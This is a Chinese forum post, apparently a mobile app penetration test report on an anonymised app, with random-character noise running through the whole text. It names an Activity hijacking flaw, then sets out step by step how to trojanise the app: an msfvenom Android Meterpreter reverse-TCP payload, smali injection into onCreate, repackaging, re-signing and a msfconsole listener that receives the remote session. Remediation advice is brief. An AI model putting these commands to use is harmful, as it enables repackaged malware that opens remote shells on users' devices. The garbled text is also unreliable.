. `- ^. T- B( u3 ?0 L ) Z. S7 ?' K5 w   6 l8 j3 m$ B; k# o4 M. j 2 w* [6 i6 @0 Y- ~) _; i. l4 `

# Y8 B. o( |* O9 r8 \. O ) f' I0 _& a+ j* V0 G R* I

7 p* s3 j9 h- d% D& s% {: n/ F7 l . y: A' m1 v5 a 1-2 测试结果 2 `' E$ P; X8 V9 o' }& B ' f( R5 N+ U) J: s- J' [' o1 d

3 v* }! _4 X" |7 W8 ` - O. _, q- W$ C: J- R6 R, A: p

: w3 N, q1 ]: s 4 a8 S6 Y3 ?" E   ' P h; r. h; W( i " f- d7 k X: m

7 @* J6 W8 G$ ~1 Z) O3 b1 v" d( z% k! E X4 T

( { [# `+ C% D8 v: b! K6 r$ v0 s" i& d$ j9 ~4 x8 i 2 检测结果                    : [, |, h$ G& Q/ m , H* Y/ F) ^, [

/ N0 K* {- g! d2 ]& Z) K. t1 z" @) u1 p

) m9 T" b! B4 Y: ]4 ^2 H7 ^ " ?, K$ g' G% ^2 K4 J6 L 2.1 某某某 & G1 o, q: A" s8 l5 m * A8 T) [" x0 H- `/ H8 ~! i

' C) `7 g; K' | $ S0 k% e* S; J. U7 k

+ z# z0 {' H1 C- O - l6 C5 H o. Z5 U7 S1 h4 L 2.1.1检测目标 " o5 q- R+ {% v1 ~5 M- R& ]$ x5 E # E8 T0 _# v* m8 O/ c

7 J4 V ?! X5 Q 7 r+ r% s2 b+ \; u3 r

" e) x: ~2 h& R* j+ @ 7 d+ d& Y( P1 c. x 目标地址: 某某某某某某APP 8 r# T+ O( ~8 w& e& r/ ^1 p8 p& I7 ]0 _5 [- U0 e! |# n

8 [1 U7 } E- O( a0 D; c# B% d4 \5 D8 h9 j" [7 K" x

: J( A' t6 Q e0 E+ u$ E- b/ ] A9 b$ ]( |' I9 y 2.1.2检测结果 ' _0 f/ w# U; R9 u- o* f' B1 f$ i, L ; d* @/ g9 t; S {1 R+ I/ S

8 Z, c+ O* ]! M' P. _( V. {1 j- M0 z+ q) x

0 r' s& D: V' S) i% E" U+ r& `- c$ L1 R5 p 2.1.2.1 0 {0 u/ x, u0 A7 F9 f, P7 @ 5 |/ ^8 S* F/ x$ v

1 u5 F8 [/ p# P. M & A7 H+ R" c" p3 b

# _ i0 y' D9 c2 P7 `) N ~* F ' U. q5 U4 y$ H5 a, q 漏洞链接地址:某某某某某某APP 7 ]) {/ p' n+ c- N2 k ( H$ _" Q. ]& K5 I

& G! d; o/ n$ V# l ' h3 R r' g. V- c6 P

! C2 Y" G3 ~8 ~9 ] , [ T1 _/ | ]0 L! C5 @( Z   & R8 ]; } F( c0 Q ) l- R+ _. M# ^) I0 R5 T* p

5 C- j+ v: N) R) r B1 [% G; r# O1 ?

2 l1 [" E2 s( U1 c. u3 F! q / V! W s' i' V* m. ~2 a* J _; r7 `0 | 漏洞分析及取证: * U7 Z/ t; z) {! C0 p6 o# G$ w$ q1 d3 A

# o/ z4 V" ?3 B6 f, X4 g' G; ~9 P : O; S$ J/ y/ I, D4 S+ q, i

' G6 N( j0 ?% q: z# x 2 p2 `& a/ q. T                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ! c, e) d' E7 M2 N- L% L1 C. c# E8 Y

& i1 n+ }, V( Q 5 h, O7 j, E; R3 `/ T. \# g. ^

& x/ Q! O* r$ K4 i' }# u# E9 m# t - J7 i3 m% B8 _1 G' x3 @      4 L4 S7 a$ y3 ?( o, v, ~ n! V) Z7 M- k/ j) P# b+ F

( e' n K) n$ n' R5 C8 b8 m 7 u3 Z! ^* B! g& m- B

& A* M3 m2 ?' `9 G8 o % e7 E8 ~/ n% Z) }) N( I' H/ K9 N4 n% `$ C                       . F* u1 w# q) X! a) v - [$ z1 [- W* y, h) ^4 S

: P: ?+ r2 X7 _. h' s+ y, R2 w" u& G1 |, W2 K

, U6 M2 [* C6 j% f! d8 D 0 D8 K; D! P4 y$ @8 c. Z% O " \+ A' {( M5 w% N) f. C( l ' a4 p3 ?" d* i( L

) X N8 m' s& c: r4 p 0 N9 Z9 {1 m( v3 n" u% C$ L# n

+ \' h, i+ X8 h/ u" S 0 ]5 s; T/ D; ?/ c , i- s4 S" [' W1 p0 n5 `. @; Q& f1 G, Y4 d1 T3 q

4 f4 D6 G4 A7 _) t5 ? . g; R a6 m) p- @) ^' C% ?

* U9 v! K- q$ J) f7 z , Y B# i: [: y& E' | 7 @ t- V& O5 j8 P5 g 8 r3 C2 m" S$ g& \# H- z8 T4 C N: W

: j8 i3 w" Q2 `# \+ S1 @ V5 B0 x6 A! u v

. Z* d+ p( R( n! P( w : L( }/ s. K6 u9 s& t; k 漏洞危害:高 / N) ?1 }/ k4 i l) i/ h' D , g& p$ v7 [, Q) t% h

3 N5 W1 W5 b# b+ w: q/ k1 t9 b / l: ?, r7 {9 A% b& q2 j: M. n! P
3 J- @7 P _8 x+ X$ L& K6 I: a8 T$ ? / ^5 `7 \) A2 p/ X$ a2 g* g- {, x; j$ D8 T: L# Z% B+ Y+ m; G8 e: v: a; d) h& _% S4 e L5 {: W; Y3 s# m, C$ P; \" X' u# s, H) s) @4 o* _+ H& ?* A* Z4 c0 b! p5 U5 x; J; F5 O- V$ H- D* I: N2 Q( Q5 o: _" b. B! W; }; }( a2 h* B9 {( w, [% G) @3 ?! F, }6 p+ c6 |9 C4 O) D+ l1 S+ Q: S) _! r2 y G8 d' f; M0 E5 M+ ~: D2 v5 s. G3 Q" _) T. f! z+ e: V8 R9 E2 w( l+ m5 z! x% T2 L4 a I& l% d# C" Z" A m: J! q, C1 H6 {7 g9 k8 |2 ]5 L2 Z v1 W& H# a5 g" ^: p8 B& r" M6 o( ^5 Z0 ^8 ~0 ?' z4 d ~0 P& S! _: N, W. h8 j; O: @9 w: w, K2 c+ A" e+ x: _2 R! G- T9 H
6 v& `& Y& G- O3 q( Y! K # P9 R- r+ C- Q8 ~+ J+ O7 a' j

& L8 b' Y& I9 p; i: _/ q+ G# L/ I s5 A% N. @' {4 p 严重程度 ) `# E8 H: ?- e+ a2 G2 e `" {4 |# g/ L' J6 w

' _! y3 }" W8 P0 P1 s : g+ U+ M0 P2 z( |& w' X7 p* f$ d2 { 		! N5 N; @1 \4 C- k: c# }1 L+ i $ J# H" u2 Z) A" g

" w# K+ J7 J4 h1 j7 u4 P# z 6 Y, s/ K3 V( G, e ! u7 {. r0 a. } 0 b. Q' o7 D! o' o( f) u

9 F/ d! g7 g. I ' Y4 x+ k" I* F$ j7 d: J e 		- T% h/ Y; c- i 4 k ~5 R6 t& H% F9 ~* u

5 D( O0 j1 L1 s7 ]/ N7 c9 ~. |0 v3 `% U& s* ^- ~ + x7 i& d$ |/ z$ f8 v5 N3 {1 m1 c

2 P8 A9 v+ T& ?( r ; h0 z }& X; O0 {7 u3 v2 H 		/ y* J; R; B4 X" a3 j 4 z* s- c' c9 y" P& N8 W" i) L

: U( S2 h- i# q. n8 K / e! c3 n- N c8 ^3 h' h) @ - Y! l B8 [* A8 ?2 E& _ 2 c6 f8 o1 Z1 X7 k" k

/ x( M6 c0 Y2 l( Q- o " Q7 \4 x# j: j5 {+ Q/ p 		# h/ o) v* S2 D/ c- K: n4 R# u# g

' W/ R: c1 {1 B' ~- d" ^$ f; f ! I3 X% ]0 C8 z2 H+ Z   $ y0 e# e" b; u C4 i5 r: m0 N' ]; V6 N; E/ W3 Y, t7 l

B4 c. s5 ?/ ^/ g( |2 k # F5 B3 B+ s# n, v1 B3 Z 		' e4 I9 t! n. Q# b, W% [, I" O% S; a. A2 i6 o8 g

& A4 U* a0 q# K# b / j' Y# i7 ~: _6 q9 T! S& g ) H W: m! p7 ^1 L5 h ( Q2 @: [' @# h% w8 M% f

3 Y4 m; L, T; [) A/ P% T% q S7 E$ b) Y6 _7 f& f- f1 H4 R9 D 		2 X1 {: g0 ]2 b7 i ; `8 o6 ~3 I+ W. M: r" F

1 \# X2 w! @4 R) S6 A4 l: Y + E. n9 i) @$ F: C- D, ^! ?   " s, d W9 k% g% t' |3 G: B. @ 6 I6 b2 Z p& s* ^8 W/ B$ x8 |

/ X8 ~# q# _( d% ^- W! R6 S7 z K 7 b$ a5 X/ @8 ]% y+ E2 K7 q
* E. U1 J( n0 ^" b v0 k3 [ 3 i( Z7 c3 Z2 V7 K' ~ q
9 {+ z: u+ j' h7 R1 z# \0 n 5 C. |) l6 V( V/ K

" K; n" K6 S& x3 V. ` / {) K& Y1 m2 f7 Z' R: A6 \, ~   + L/ Y* V/ @- }- G7 L- J' | + V4 u3 j! z6 n7 I( i/ c |( z* n' @

1 H& A5 D5 s/ p1 u; K 8 ~. C3 }2 J- V) t; C0 b

! \/ y; r! S1 T4 X& U6 d+ \& j) ? - M2 U+ H/ ~1 c P' C4 o 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 , q# i& D4 A6 `. ?# K1 c# n1 t! s. _6 O+ h5 n7 ]

) h7 b" a7 o* a& G 3 o5 w4 c# W2 |* ?5 p& X

$ {) @# |$ o. g$ d0 x* T( G' T3 V( b- w) r |" s1 |           9 X" ?; M& R) J8 {8 I3 Y0 o+ E+ F 4 \$ t T1 X/ s$ I

0 X+ {& s. k$ j! M& Q3 w , s9 [) E( X( U( K6 E+ \, ?( ^

5 |" \% R( y" N9 Q4 f$ X* y! C1 _% u   % [& c# B: k3 V* U1 H 2 i: M, v4 A& }+ G

, T7 L* Z3 M( h" V" |) P: t& O9 J5 ~0 s/ U& m0 v

: B- k% h/ \ h. n: b8 X8 B7 o3 A4 N6 L4 S2 |4 \ 2.1.2.2 & A) c6 }, q# K& e: |) K3 _# a 2 u) n, a! q& d

6 d' h9 E/ V% P) P # q4 Y/ J+ W- H/ B" p6 C+ v3 K

7 b1 N) Z8 Y( T" ?6 v o1 T) o - _1 J! |# z: u. A. W9 }6 F 漏洞链接地址:某某某某某某APP % I& Y7 c" V9 Y- y3 g4 e; q! t4 x9 |6 g! ~5 J! K( j- r5 l8 N( w, M

" \9 s/ ~2 l( Y* E , o8 f+ Q5 U( J9 @* ~3 J( M! ?

" B. y( G% U9 q# l4 x6 F3 Z - K! _2 b6 R4 _! B! b0 Q 漏洞分析及取证: 3 Y9 Y* M& E% T: g: O( V! n. u. `* H7 K9 b1 D

- M: ~+ c: m2 |" j) O" } 2 t) b7 H5 g0 {9 i/ V" `, l; D' [

# O/ b% U/ n1 s. h1 H% H 7 x" m0 `0 }& m                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: . H8 L" S. m6 }7 \+ M " r+ ^% E4 |0 }0 r E0 N

7 t, Q) G M, b8 z' d# a# P! p 5 N6 A3 l. ~$ L M0 W) D: w

/ ?; z {% ?- H ^: a8 t 5 t) _4 _ Z2 b- U Metasploit 生成木马 apk - N \" g1 o) Z- R Z, G% A+ _ 1 d% W2 j% z( W9 b) J0 N; x

3 @/ ~ w3 F% h4 h8 H3 A7 N& v/ V4 R. u; |% d2 C& J* W

; l; P2 s! S' } 3 n3 k: j3 } B! } msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 u Z, _4 h5 j" S2 a $ J: X' h$ m$ N0 Z( s) R g

- r) U3 e/ e9 C. V( b- a : p3 M0 X/ u+ Q& l a% _/ B# v

3 [7 N+ V$ k- c6 y" D' y : Z6 Y( e0 u- F: V& e 反编译目标apk和木马apk ' l9 t; K+ T$ }. M) v8 E 6 H+ e9 M) o. i* I8 `

, D6 i. A! e5 @. r3 O! \! Q ( M' B0 u2 Z: A. n/ _; x2 J

0 X, c' |! x! U$ t) b0 | + I- P& W) i5 C9 M: N7 V apktool d target.apk
% |7 N Q, P6 p6 D- B M$ { 9 m) f8 e) E0 F! H; ^ apktool d cockhorse.apk 9 _- i3 D' [0 m3 W / ], U8 D1 A+ h0 R6 l

; w( |9 O6 N5 H4 K- n7 O' d6 Z* Z$ j

5 J4 w- v6 Y: p- i , |) F( R4 A8 `% [: N 木马 apk 注入目标 apk 7 v6 Y/ d* c5 Z; `) ] B 1 k) ^: b% F* G- m

6 s9 K5 ~# Z9 N6 s c' O ; W8 \1 D6 Z' J. S( j8 \

- m4 y+ b6 b3 F3 P# s # l. w& Y9 ?! B5 V 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
+ j. r, w. `- I4 X- m' y : I- u/ q# w! U invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V " c7 L [; f: w0 X+ q- y6 d0 \, _( l( C" t7 d S

7 _' h$ i% E n% L+ b! Z; A5 [9 l6 A5 |8 _6 c

8 P2 z' I3 M/ }& z4 M ! [) w3 d4 s ^7 p* b( ` 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 : {; |& V. {% J: l: t* p' g + ~! R/ S4 m% y! H% e

( v5 R. u7 D" F6 K+ ]5 g ' r4 |3 l) J8 [8 ]' U

" z9 r& [" r& f5 a, R) P8 b & _2 Z- q; y( m) C7 @ I 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 6 }) c" m, P! L; B- a! x( X6 {$ ?7 d1 a

9 R. q' H F& f' {# ^1 b 5 R/ T& @8 ~/ u: ~

# _) A' q! t5 E* j( o+ s& p. d( q R # ~( h* g" q) i7 N 回编译生成最终 apk 0 d) X1 E3 u6 F, x, n, z+ l & g7 G1 C% ?% G

3 a1 N4 a0 W0 L, L5 c7 I 4 g, f( R& n2 a9 B2 d( P

4 q. a# @/ v7 g9 d " ?$ c$ V/ B0 b( H- ?6 U 重新打包 ; | I( l/ B S4 p1 z+ s ( e( x2 Q& H3 N

7 I! L2 d, q: f' r4 k$ m& e$ O0 f9 P) A0 h: |: |% c

b9 D" \# q0 u% Q% j ! H; X2 I' U" u+ Z! q% F5 J+ B7 G apktool b -o repackage.apk target_app_floder 8 T4 ~7 i- s0 V* L5 v) C0 N& b$ t! l% v2 D9 F. K/ D3 ` t

, [+ \7 S# `0 I1 c ' l9 B8 ~/ J) t7 p

; E8 y0 A9 X, {1 v: O0 w 6 h& ~5 o# {2 W- [4 s6 C 创建签名文件,有的话可忽略此步骤 & \: n2 @0 p1 W; r! o( I 0 S* h2 ~" B! Y: [

0 H7 m" b) H5 s8 T, ~+ a5 F ( O" v( {7 d* T9 B

; U. Z8 D+ H9 x. a1 y- z! T! | o, `9 D* e, p3 ` keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                5 k6 u: Q# q; j" c @8 D; W, A5 C- ]' q* ?; p3 j; x6 \

0 L4 I& S, o1 u$ A. C / }, L1 ]% a1 y9 Q E

8 Y t( z) j5 Y5 e# g 7 K- w( Q1 P4 d; I4 v1 W 签名,以下任选其一 4 o" H z4 o4 h9 h; N( O 0 N) v' ^8 X1 B. ?- ^% f% p. Y

@, U9 S- Y0 _3 Q/ N4 K( ]& ?1 q ! p1 G' Q5 A3 O0 H8 }' B

) ?' E4 v- ~/ A! y $ C9 @$ a6 x+ g/ f jarsigner 方式 ' {( f2 j6 W5 u3 U6 ^" U , B0 j+ D& j1 S( j

& f3 U( z8 R" T) r. h& d* ] ' ?, } ]0 @" X1 t( [3 `

y1 L5 |6 d' c" }; T a* _ - [& f) w+ b4 R0 E$ P" ? jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) B) k& X: [. ?& @7 b- v3 Z" F4 k( J8 X7 Y. v9 e3 P3 {

# r: j, m. X6 ~7 r# `, ]9 Y+ G * j* @) I; S& ^* ]0 ~& c+ C5 V

8 _) x o7 Z2 l3 ]$ ?/ }0 U " [, _( r% B9 i' _0 n0 Y( D apksigner 方式 , b# U2 r9 S. T8 V$ l4 d; Y1 {: ` c4 j* k

: r, Q0 ^) p- T0 h$ W [7 U1 _4 a J2 } y" |* }1 m

+ `+ ^) y/ D4 a0 D # T+ o0 I8 V: i; Z apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 8 i$ c. w c% a1 j2 [. { q* t 8 s! c. S7 Y4 G. W u

0 I1 G m7 M/ }* F" A! [- M$ B+ I& N6 B! O

8 a% o) \& t9 F) A2 D' c# Y1 Z( ] 如需要禁用 v2签名 添加选项--v2-signing-enabled false & Q9 g7 V5 }& m* L( U _ + N7 P5 }6 L: `4 E. B; u

" M, p( r. m' p: I & z0 A9 N" Z9 w6 r+ h- G

) r5 k# b6 C8 q ! d+ m1 X4 h! P3 ]' g" E 验证,以下任选其一 ' K9 _- P. U7 V: G, c' A- n3 @- H% D1 f: H$ ~' E9 C* S' E* b7 @

5 M/ q: p; ^' J % f6 G8 N+ x+ X; G; x

- U9 f- v/ D9 ]. H8 p & u1 o2 N! q& ~9 t/ s) C jarsigner方式 , O, Z4 i; c+ G; n7 j- p7 { 8 ~4 h: |$ L+ k

2 I* B i4 @+ T! u5 Y9 w3 o( W3 y |9 n8 ]+ |) q! }

5 e! _, U/ v: K2 { 5 v; \" a9 M. K8 e jarsigner -verify repackaged.apk ( \: s; k* {- m$ w& @! v 5 C# [$ O9 i, `! V

$ v1 A$ G; H& F$ x3 ?( Y& W" x- m( h0 F% {( [& s! ~3 a

- T) o' J* c: R( g* y* a, q2 d& m' M & D; U7 r$ D% L( R6 N O5 j1 b: t* X apksigner 方式 0 i4 v# b/ P2 V5 n 6 E9 E) h9 @$ ?' D Y& t! L

+ ]% z3 v0 a1 I+ n, U1 V% u 5 e/ `. [4 v* i

9 `2 u: Z8 F% C H6 O( o2 J+ K) |' ^" _2 K8 w U apksigner verify -v --print-certs repackaged.apk " j% M' `. |) O# }6 |: r$ P) | ! ~7 c2 T8 S: p2 B' Z7 `" C

/ l; a* H5 e- m) i$ r! q- L ( X3 O" t7 J; Q; f2 }" e# S

5 e8 k- s6 E" A Y( _+ ~- ?9 z$ S2 c5 A3 u% g, C8 f5 H6 D keytool方式 ! s; T7 J; `/ d4 l" Z - [ L$ \! V1 G9 z

% p; q# s# N4 d$ ?! x0 @* s' y' z, C . T. v( Z' j) P5 I# O

9 X8 k3 {% ]( P2 u8 w " _% w- c/ D: Z keytool -printcert -jarfile repackaged.apk : J/ ^# h( ~# J: T5 W ; {9 j5 Y5 ^ e8 j1 }( c4 X9 \# T; B0 y

. |' ^0 u3 s3 r* m8 k5 s8 M9 O6 p" M / V) p, H9 o" R+ {

. y' w d( N$ n+ t6 S' b' _9 n( D7 z9 C' R1 ~+ Y4 M8 _, p3 q+ W 对齐 ( X4 j1 M) G0 W9 o9 e / a+ U0 z9 V# z7 w

" s% K: y2 W, ]5 y3 I . ?9 q8 h, }9 g% E5 }& [; E

: l0 C( R+ T) v2 s " \( g: T2 O) n& ~ A. ?- Q 字节对齐优化 $ H! w+ V+ \! d6 v9 F- F2 ?2 g0 c( I, R3 Z. p0 V$ B

! T! K0 |! s; }! Z/ k % d9 b9 V" ~/ x+ e: R

4 ~7 J" j+ J* |0 y0 p ( N5 Q$ J0 I5 \5 u& V zipalign -v 4 repackaged.apk final.apk 3 T" I5 L3 R3 T1 j: t( ^: W & G+ K" [& }4 k

) p8 R/ I/ q; {2 m 1 P3 x' ~& G* h" q! Q

2 I" v9 w) d. Q$ o& z - Z9 j, l( \7 H, i6 C; Q" S5 { 检查是否对齐 , X$ X) e. ^" P" F, u! g0 w$ q& m: a9 X- N

" H8 u5 |$ n0 d5 G . E% c {% B m1 N5 p

3 ]8 Z9 s5 e+ ~4 { + [9 m7 x0 r$ j0 a zipalign -c -v 4 final.apk 1 s" ^% {$ j: C9 P8 ] 9 U& L3 J/ g3 C* D4 \ m

# C) e4 E N9 K4 i/ {" _8 e . D9 }9 \) G8 [

f; n1 r/ T+ `8 v2 R+ @& j & @8 b, |( n9 X8 T1 ^ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ; _! M- _& Q4 @, } ; X. L9 x% m- B3 Y# ]+ j

/ Q" ?4 R7 p! h7 q- f, q) C : g) W2 A- r8 E" j7 d

: z% `, c; ~- R& M( v% F- y6 [3 l+ m5 x/ L/ {9 ? 启动Metasploit控制台,配置参数等待上线 % {4 D2 k3 E6 ^1 s0 W8 H2 t1 X4 K0 ? ; O* [9 m5 w; P

- X( m8 M5 J0 c% m! l - z( I9 J. e8 j9 E& Y5 G

7 u* P) r0 ~) O% s7 [; I 5 `/ B6 ]( X/ }3 v 在终端依次输入如下命令 ; ?4 x5 x, o( v$ R : g( X2 G' C- i9 E" v) ]

' F& c; p9 D9 ]% g( P2 Y& N& ^ % u% X/ n7 ~/ S5 _$ v$ E6 C/ `

0 L/ Q' A+ [( L# E5 d5 P T8 k0 F, F* N# N1 o msfconsole 1 b. M3 R5 m2 O1 i: h3 S N/ ?' n: V, h; g

7 M ]8 }8 y( ?0 c+ Y/ q9 J: K1 J: Z - y( Y* z( u9 L5 b# U

$ Y: U1 {4 g$ }8 ]* b. _$ }5 h7 Q : o/ h" a, m3 ^! Z4 G+ ]8 D( c use exploit/multi/handler - x" N1 V& z* W/ ~+ h6 s8 c8 X1 q4 R0 k8 p( }. `

; j; |, K: {$ Z' M0 l, g G! _' q' K5 f0 a( s+ y, m6 K

8 o" m) k1 O' s" Z- G7 E ) d; A. }0 [) P& [& h* Y6 D set PAYLOAD android/meterpreter/reverse_tcp & ]7 J& |. u* h 3 A; p9 X( Q/ Q9 Q$ A

" E+ f' G6 W4 _9 g * L: I$ u' c1 d

; A7 h2 e9 L* d ! O/ E( y- m& _" m set LHOST 192.xxx.xx.xx 5 { ^- M6 W3 O) {+ x' \) `0 b0 ]9 E' U( w/ t6 P# O

- I; X) N- { c8 Q! h; u, z; t- j, S C8 [6 M- h, a

5 X: ^0 A# ~* Y! \% R! J; N9 s) B0 V) x; S, m( `! m set LPORT 4444 ( p3 h) {. N" M0 T0 ^% [& `( N) l. `* G$ Y

( [, M. f! i" h* J$ z7 N+ x / s3 z# r7 O5 P0 o" V8 `2 f* m2 v5 s

5 {2 k; e# C$ b& Z) Q H8 ~8 x) X ! S4 e b( _5 d4 R+ [" y exploit : T3 @- y$ H+ B' b $ U+ A8 X$ L6 Z3 z$ J

/ T6 d7 e- a: I1 |' ~1 r 4 k. @' R: p9 u- f/ `) R C' M

# Z: P. R" M% y/ z5 U; V ; Z7 V# {% q' u2 } 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ' C: [# C7 n- l; j ! W& N9 m1 d* m. t( Q }

$ t, ]8 c$ [/ l* H' c; _- X0 ~$ `6 l2 u' m- q

- z- L+ I' c- ]. o- P& E* s; z. h2 Q 3 H& ]+ ^. z0 v7 Y 漏洞危害:中 * r! L ?0 W$ F0 p: x/ k- W( _& _* M) `7 N- [: Y' |- Q

2 A2 @- B8 G- b 1 n5 M# J. Q1 ?8 N7 D
9 F7 [+ F' a/ y' @8 K$ O( a 4 X/ G; r b7 B6 _* G/ T+ X% Y6 ~ w8 }" g4 R! c# X. m7 b* }. ^& S6 f i7 h5 ~# @ - r$ K8 a) N6 K1 h* z4 ]" ^3 ~9 G, M1 \# y. r; W9 k1 B4 w9 S4 ]4 x# Q/ Q% d Y) U5 f. n( P6 I) E( c2 [& Q1 M" q$ B4 Z4 ^8 Y6 X& @9 ?" L' Q5 V% U% c, _; q1 b5 ?( @4 K/ ?6 y2 i+ U7 P4 _+ C5 o) ]3 N2 C t! m8 X: @ Q$ K& ^5 \2 A' g5 F1 C3 n8 Y5 z: N n& x8 R( F6 o4 M" W. w7 M4 ]& D. j; I; `, f; v% s8 `9 g6 V1 Y4 W( e k# H' [9 l: j/ t3 ?! g P) K0 m* v# ^3 [% K1 u, R% F; Z; g8 z& v' i; d' v+ X% C( Y- r1 `4 I! h1 K/ j) r* b: B" ]8 T' h* w& X+ A$ b4 T; E7 r- @8 `7 t) c N' i0 p9 [+ g6 r$ F- R& Z. Q) R& N& s* N: A% }! @/ k+ P) O0 v3 H5 \; i _" H( L9 C( Z" B" J2 h( l% I1 K2 H: [0 A0 ]% y$ P5 e5 _8 B
' X. O$ q1 D/ k) `; I 5 R& m+ s- P7 @9 L( [

/ k. Q) N5 O; C4 n6 G) J: m 1 S1 g C7 t! o. M& `+ }: v6 J C: s' m9 w0 f 严重程度 ( j- P- ~/ v& Y) P5 ^3 j } * T8 R3 k% d% j/ {+ {

+ g8 y9 i3 }0 H) _2 ~( u. S4 a' B$ n, Q9 C8 l, { 		3 [, s F9 ^0 i1 `1 C1 e0 ] # D! u: {3 I5 z; D# L

. e+ B/ u) e1 ^8 n- d: z$ G 6 J) T# i% C4 C' a& @* x * l* A' c1 Y$ r & Q+ G ]9 B/ M* Y+ n

& q y' v# r9 [/ y; H' p! l 2 [/ f+ r) ?9 @2 @2 U ]2 _ 		/ i6 ?. R" L5 g ~8 F# B y+ ~ ' p: T1 _8 T. V# a; N( j; c2 F

) B- S# n4 \0 Y8 p0 ^ 8 u# y# y& v; J4 U+ ~& I8 w + Q0 P) q3 v2 p4 g 8 ^. ~6 T8 \, W G, w& C

! Q( F* Y0 L/ c7 g1 s + J, T3 @! [6 K5 s) M 		J- R+ P$ s. C8 t/ ` # ]; P) ]6 j) R" v

8 {% J; f8 K; n6 K5 H) L, k; H. q+ `0 S' ^$ }& x: n. J% V0 `# m4 t C2 a9 Q% X( G) w9 s# K' @! i # w: l" r$ i% f# `9 j

( M1 r) l3 Y6 v/ W! @, R. i8 K; O8 I2 r# N) F- {0 v 		3 V1 Z5 j, _- z% I ! |9 r. u8 _! @3 X3 N# O 3 I- H6 `+ q) B9 x4 e : @7 V/ b7 F1 @ e0 k5 J6 v6 N3 \

2 k7 ]/ |5 J! V/ H) V0 i5 L, }' ^; u3 { 6 }4 \* ^3 ^* U7 R }8 }   0 {5 N0 M# Z5 N/ Q " K$ T1 g0 I# i' t# D2 x$ g2 C

+ U: O; N% H4 h * b3 D0 C( D/ Q3 C* H% D6 \ 		9 n, E) E* v+ O7 C7 [ 8 ~1 G3 v U! q

+ @- f4 |4 w: w. O5 W$ y7 U+ g4 ^* V5 J6 i7 I * q( b7 q4 f2 ~+ i# y' ]0 K7 Q4 W* D- F, T: p/ i; ?

; |+ m! e3 R& B5 k6 U3 J& b+ O0 T' _* ] 		5 \# [% C- \+ L* _/ T& S3 }' V$ y) ]: L2 G9 a7 F/ t- j5 _# C7 X 5 Y: n! R. D0 m$ l; M; [ 9 `6 b/ t0 W2 ~+ x

7 J( Y V0 [! ]: p/ K9 c. |8 u2 B* b' [/ n. W   % Y( u2 G' Z* ?1 u5 G( w 5 z) R7 Y# U v& @

) v4 k) u% R2 u/ I % y. j3 `0 S2 ]/ i/ Z; |3 y0 X; G3 p
$ ^' @ Z' g' D# b# _) q$ q- _0 `( W0 \ ' s/ r' B( D' L& A
# u) W! ?2 L- c0 J) `. O2 a . }0 Z3 z- ~, X- L9 q

) A" d8 O; |9 y6 D + \: p1 ~& _6 q" u) R0 c/ O   . t o7 W4 ~$ I+ W4 M, z 2 z; e2 s T8 A0 l3 U! F

W5 q5 c8 |) v3 g$ r* L+ T3 g! R. c* D

" m* \% B2 e, Q" A, l . V4 u" V+ x8 t" N& Z 修复方法: 6 L" W/ t: h; g1 Q/ { . I3 l5 i3 \5 t: Z3 x

& b+ c7 \: q. d4 c2 o: r `" a3 X) L/ y4 f+ R" s

( }- k, _6 f* d, ~0 a6 H. a9 b( \2 @4 [! |3 N! S% f7 n) S               1. APP 启动时应做签名校验防止二次打包。
@; e# m" E' b, K . [, W& H" C7 |; q 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / r5 B, ^( W, V- Z7 L0 t ' L3 L# m. W. c) i# e, Y. q* X1 t( @

7 R4 ]* A: w2 g5 `+ H U8 ~* n% L3 S/ \* ^ $ f. R' b; }" Y" E, d* b1 i! C2 Q" C) k

+ l8 J, x. x3 m% B4 c% P4 y- U& l s; J( @   ) L9 |" L4 f- _% B# ] ; o+ `6 D3 R5 y3 y5 A- \1 _/ L# s. u2 B! E

1 e3 [- S, y" |$ y* r) v5 |) J4 v6 M8 J3 E9 u2 T0 `6 Q- [; S+ W0 } / n( s8 U1 _. |' Z 4 Y' \5 W6 |9 o- F

# r! v& y5 t7 d. ` - M% s7 P5 `) E$ z
) U) M; ?8 ?/ X2 ]2 X. y $ p" c1 ~; X) ]) w4 r0 |4 ~

4 B! I: i# d/ X9 F6 W9 E" _7 U4 G4 i* T5 k1 u' |3 n Z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表